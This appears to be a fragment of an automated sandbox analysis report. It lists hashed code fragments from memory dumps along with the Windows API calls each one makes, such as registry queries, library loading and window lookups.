                                                              • Opcode Fuzzy Hash: 763a7367cdd12fdc179a69c9c34ec38965e5359dd1716dd50fd55c61afe8a58a
                                                              • Instruction Fuzzy Hash: 0441A0B1D00249DFDB14CF99C884ADEBBB5BF88314F24822AE819AB214D775A945CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1D30A5D7
                                                              Memory Dump Source
                                                              • Source File: 00000097.00000002.67442266637.000000001D300000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D300000, based on PE: false
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: bd7d272a66e3d8466004bcd249798657cef49d3e17ceeb21a42bfc8ee7146796
                                                              • Instruction ID: d6db60b1cba1fbe350c7495c758c32ff3c4b4d035cdcabefd257dfe5728a629a
                                                              • Opcode Fuzzy Hash: bd7d272a66e3d8466004bcd249798657cef49d3e17ceeb21a42bfc8ee7146796
                                                              • Instruction Fuzzy Hash: 8F416A769002489FCF01CF99D884AEEBBF9FF48220F14815AE955E7251C335AA15CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 1D30B4D9
                                                              Memory Dump Source
                                                              • Source File: 00000097.00000002.67442266637.000000001D300000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D300000, based on PE: false
                                                              Similarity
                                                              • API ID: CallProcWindow
                                                              • String ID:
                                                              • API String ID: 2714655100-0
                                                              • Opcode ID: dc836c0a5af093788fc56cb888f97d904e38e6e54d1dc50b0f53e624576079ca
                                                              • Instruction ID: 3ee575e6c3ac4a8593a21a59c36f8e990baa618590c164eda43fe07a3560ff13
                                                              • Opcode Fuzzy Hash: dc836c0a5af093788fc56cb888f97d904e38e6e54d1dc50b0f53e624576079ca
                                                              • Instruction Fuzzy Hash: 6B4158B4900249CFCB08CF89C488AAAFBF5FF89314F25C569D519AB321D734A941CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000097.00000002.67422557539.0000000000F00000.00000040.00000400.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
                                                              Similarity
                                                              • API ID: TerminateThread
                                                              • String ID:
                                                              • API String ID: 1852365436-0
                                                              • Opcode ID: be261e5b0bc196221b5f251d0a4a187f856ebd3568990b462c7f98fbfbf6a592
                                                              • Instruction ID: c74e2525078b671c2757552fbe949361ac91aa10c8cd796f4932e4aab31b68cb
                                                              • Opcode Fuzzy Hash: be261e5b0bc196221b5f251d0a4a187f856ebd3568990b462c7f98fbfbf6a592
                                                              • Instruction Fuzzy Hash: FD31582654838947CF355E384C983DB3BA38F63660F9982AECCD41B1D9E334484AD607
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0149F1C1
                                                              Memory Dump Source
                                                              • Source File: 00000097.00000002.67425499980.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                              Similarity
                                                              • API ID: QueryValue
                                                              • String ID:
                                                              • API String ID: 3660427363-0
                                                              • Opcode ID: 7199c9e50df33717eb106c9c66c1ce523df9e6ec0b710f9ac5c901376324c3a7
                                                              • Instruction ID: e8024a694cd3ecc22b09174daae1b652771df65845ed45b8a0d0aa9df14b55ce
                                                              • Opcode Fuzzy Hash: 7199c9e50df33717eb106c9c66c1ce523df9e6ec0b710f9ac5c901376324c3a7
                                                              • Instruction Fuzzy Hash: 2331D1B1D002589FCB10CF9AC984A9EFFF5BF49314F15806AE819AB314D770A949CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 0149EF04
                                                              Memory Dump Source
                                                              • Source File: 00000097.00000002.67425499980.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                              Similarity
                                                              • API ID: Open
                                                              • String ID:
                                                              • API String ID: 71445658-0
                                                              • Opcode ID: b5cf2563102945538bf1ae5016605af2949f5aac4ba996edf084fc033b6cfc3a
                                                              • Instruction ID: db07cda0fcffb4e159b1abd68315513bd001688242b29b7b7cd08891cbc299e1
                                                              • Opcode Fuzzy Hash: b5cf2563102945538bf1ae5016605af2949f5aac4ba996edf084fc033b6cfc3a
                                                              • Instruction Fuzzy Hash: C831FFB0D002899FDB14CF98C588A9EFFF1BF48304F28816EE809AB355C775A945CB94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 0149EF04
                                                              Memory Dump Source
                                                              • Source File: 00000097.00000002.67425499980.0000000001490000.00000040.00000800.00020000.00000000.sdmp, Offset: 01490000, based on PE: false
                                                              Similarity
                                                              • API ID: Open
                                                              • String ID:
                                                              • API String ID: 71445658-0
                                                              • Opcode ID: 706b2c933ddebff3e4e46e77ef6452b59d4f866e54d511213e18ce8a525a840f
                                                              • Instruction ID: 8007ed711cca147517702336395c94e9cdf46cbcb825a6d0ad24f147a8320ca6
                                                              • Opcode Fuzzy Hash: 706b2c933ddebff3e4e46e77ef6452b59d4f866e54d511213e18ce8a525a840f
                                                              • Instruction Fuzzy Hash: A93101B0D052899FDB14CF99C588A8EFFF1BF48304F28816EE509AB355C7759945CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000097.00000002.67424855364.0000000001370000.00000040.00000800.00020000.00000000.sdmp, Offset: 01370000, based on PE: false
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 60795ff10310429f99b88c79eecc555614efa2ae97cc5e60b0923a00394153f5
                                                              • Instruction ID: 7e2eb492feb6db5ec0619aa94a6b109a6550ace9361d6ab9d2580619cd93ac20
                                                              • Opcode Fuzzy Hash: 60795ff10310429f99b88c79eecc555614efa2ae97cc5e60b0923a00394153f5
                                                              • Instruction Fuzzy Hash: C431F430A04308DFC715DF78C498B9EBBB1FF8A308F11C869E010AB29ADB399845CB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1D30A5D7
                                                              Memory Dump Source
                                                              • Source File: 00000097.00000002.67442266637.000000001D300000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D300000, based on PE: false
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 33949aabcb6f7acb71a670f159c716a0608b4d4e11640da5705e429efa181ba4
                                                              • Instruction ID: b2faa561e7671a2f5791877fab5d94289869fb98942537aab5d431d73c5b7420
                                                              • Opcode Fuzzy Hash: 33949aabcb6f7acb71a670f159c716a0608b4d4e11640da5705e429efa181ba4
                                                              • Instruction Fuzzy Hash: 0421E2B59002489FDB10CFAAD884AEEFBF4FB48314F14842AE959A3310D374A944CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • FindWindowW.USER32(00000000,00000000), ref: 015498D6
                                                              Memory Dump Source
                                                              • Source File: 00000097.00000002.67425969166.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                              Similarity
                                                              • API ID: FindWindow
                                                              • String ID:
                                                              • API String ID: 134000473-0
                                                              • Opcode ID: 77976ef9959ef322e76c1d6c2a0db205c758e479c12a9d2fb8d53892371d3122
                                                              • Instruction ID: 787374e74753cdbd5387665d22eee3bdf7c748deb82a969dd1e9caf2b72ee139
                                                              • Opcode Fuzzy Hash: 77976ef9959ef322e76c1d6c2a0db205c758e479c12a9d2fb8d53892371d3122
                                                              • Instruction Fuzzy Hash: 42210FB5D002499FEB14CF9AC485AAEFBB4BB89218F14852ED519AB600C774A904CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,0154C6D1,00000800), ref: 0154C762
                                                              Memory Dump Source
                                                              • Source File: 00000097.00000002.67425969166.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: 2360ce98521e0385165e440da22f7aa075c5975879b6609ebece76cb812c608f
                                                              • Instruction ID: d4a8ff85f668e0c7562cefeb95e491833bde90173cc4a05d89f476ffdc290961
                                                              • Opcode Fuzzy Hash: 2360ce98521e0385165e440da22f7aa075c5975879b6609ebece76cb812c608f
                                                              • Instruction Fuzzy Hash: 4F2103B59002498FDB10CF9AC884BEEFBF5AB89314F14852ED919AB600C375A545CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • FindWindowW.USER32(00000000,00000000), ref: 015498D6
                                                              Memory Dump Source
                                                              • Source File: 00000097.00000002.67425969166.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                              Similarity
                                                              • API ID: FindWindow
                                                              • String ID:
                                                              • API String ID: 134000473-0
                                                              • Opcode ID: 6083329bc4f898b8135a8e69a3db5dfa34e0eea044043ac34ccb2b90e32e7da9
                                                              • Instruction ID: 030c3dc733397b59c746fdd4d824c571db159efc774866be6db1762232e4f726
                                                              • Opcode Fuzzy Hash: 6083329bc4f898b8135a8e69a3db5dfa34e0eea044043ac34ccb2b90e32e7da9
                                                              • Instruction Fuzzy Hash: 052102B5C002098FDB14CF9AC485ADEFBB4FB89328F14852ED419AB600C3746544CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,?,0154C6D1,00000800), ref: 0154C762
                                                              Memory Dump Source
                                                              • Source File: 00000097.00000002.67425969166.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: 9777faf98521fbe3985e7ac80f977bf7efb42d7de8be0241568de99f68a69d22
                                                              • Instruction ID: 789f6cd658b3b690e914ab5eee2571b779cae3dd689e783bd9dc1c3d069a6718
                                                              • Opcode Fuzzy Hash: 9777faf98521fbe3985e7ac80f977bf7efb42d7de8be0241568de99f68a69d22
                                                              • Instruction Fuzzy Hash: 601114B59012498FDB10CF9AC444BEEFBF4FB89314F14842ED919AB600C774A944CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,01543CE2), ref: 01543DCF
                                                              Memory Dump Source
                                                              • Source File: 00000097.00000002.67425969166.0000000001540000.00000040.00000800.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                              Similarity
                                                              • API ID: GlobalMemoryStatus
                                                              • String ID:
                                                              • API String ID: 1890195054-0
                                                              • Opcode ID: 90ff40f4145406379b9ef0c75f2276169e8661b0aaf7ca1b3416fbfdd87f81c0
                                                              • Instruction ID: 36b4e952bc26bffe54393f7a759244a64f6337751551aaf26395cf294c40a3c3
                                                              • Opcode Fuzzy Hash: 90ff40f4145406379b9ef0c75f2276169e8661b0aaf7ca1b3416fbfdd87f81c0
                                                              • Instruction Fuzzy Hash: 701133B1C006599BCB10CF9AC444BAEFBF4BF48224F05852AD918A7740D778A904CFE1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 1D3053B6
                                                              Memory Dump Source
                                                              • Source File: 00000097.00000002.67442266637.000000001D300000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D300000, based on PE: false
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 735fa51c4a694c26e0c739b35550f705443de68871d5cfc5078367be27fd77e9
                                                              • Instruction ID: accf46217bce06459c4828129e64e4d667dd0e2fb5c82a9ca32562de8936034b
                                                              • Opcode Fuzzy Hash: 735fa51c4a694c26e0c739b35550f705443de68871d5cfc5078367be27fd77e9
                                                              • Instruction Fuzzy Hash: 5C1102B5C003498FDB10CF9AD444BDEFBF8AF89324F10856AD569A7600D374A545CFA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 1D3053B6
                                                              Memory Dump Source
                                                              • Source File: 00000097.00000002.67442266637.000000001D300000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D300000, based on PE: false
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: ca8a9753c29019d91d50fed940bf05996531ddc1988ddbdfc3fc1b53cd0a2585
                                                              • Instruction ID: 13da67054a25f6402dcad1e1b1fcf847f973d064120f13dcd0aec11f40c93b6a
                                                              • Opcode Fuzzy Hash: ca8a9753c29019d91d50fed940bf05996531ddc1988ddbdfc3fc1b53cd0a2585
                                                              • Instruction Fuzzy Hash: C21132B5C003498FCB10CF9AC444B9EFBF8AB89314F10856AD929B7700C3B4A905CFA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000097.00000002.67441647808.000000001D24D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D24D000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 60ba321d05380440989e3acaef97c0f39bc4be0efa22fb4d2284c69633ff5205
                                                              • Instruction ID: 60a663daac4fed5b9abbc8903616b579afe866db5d051d105e888f4ae279e106
                                                              • Opcode Fuzzy Hash: 60ba321d05380440989e3acaef97c0f39bc4be0efa22fb4d2284c69633ff5205
                                                              • Instruction Fuzzy Hash: 81212275644245EFDB09CF18D9C0B16BB65FB88724F30C1ADED094B246C33AE856CBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000097.00000002.67441789827.000000001D25D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D25D000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e7097e86f83ff782a049a4afa1afd24ff224fa22e68f6d18c5f35068fa0455d5
                                                              • Instruction ID: d3dc33bc86d0fdb8984efb1820cdf0031c0808f05d00ea206a8f5f48620f4366
                                                              • Opcode Fuzzy Hash: e7097e86f83ff782a049a4afa1afd24ff224fa22e68f6d18c5f35068fa0455d5
                                                              • Instruction Fuzzy Hash: 9121D075648240EFDB05DF28D9C4F56BB61FB84724F20C669D9094B246C73AD807CBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000097.00000002.67441789827.000000001D25D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D25D000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e68d16868a8cfef7cbe2dc8704a4d5b0cc34ac0988f409a7c8d4096363cabff7
                                                              • Instruction ID: 184a16f3f3180b959160df064e9669ce3785fb560c2a0f1323d266b01dd2913c
                                                              • Opcode Fuzzy Hash: e68d16868a8cfef7cbe2dc8704a4d5b0cc34ac0988f409a7c8d4096363cabff7
                                                              • Instruction Fuzzy Hash: 4E217C755493808FC702CF24D990B15BF71EB46314F28C6AAD8498B696C33A940ACB62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000097.00000002.67441647808.000000001D24D000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D24D000, based on PE: false
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e654eb442871bd16356cd44a35090ba02911d9a72e1fd483032b2ec6c6171378
                                                              • Instruction ID: 21d69529dbcd28436bdb61acf5518709eec0132e5708631876bb27df958b7d5b
                                                              • Opcode Fuzzy Hash: e654eb442871bd16356cd44a35090ba02911d9a72e1fd483032b2ec6c6171378
                                                              • Instruction Fuzzy Hash: E2119A76544281DFCB06CF14D9C4B16BF72FB84324F34C6A9D8090B656C33AE45ACBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%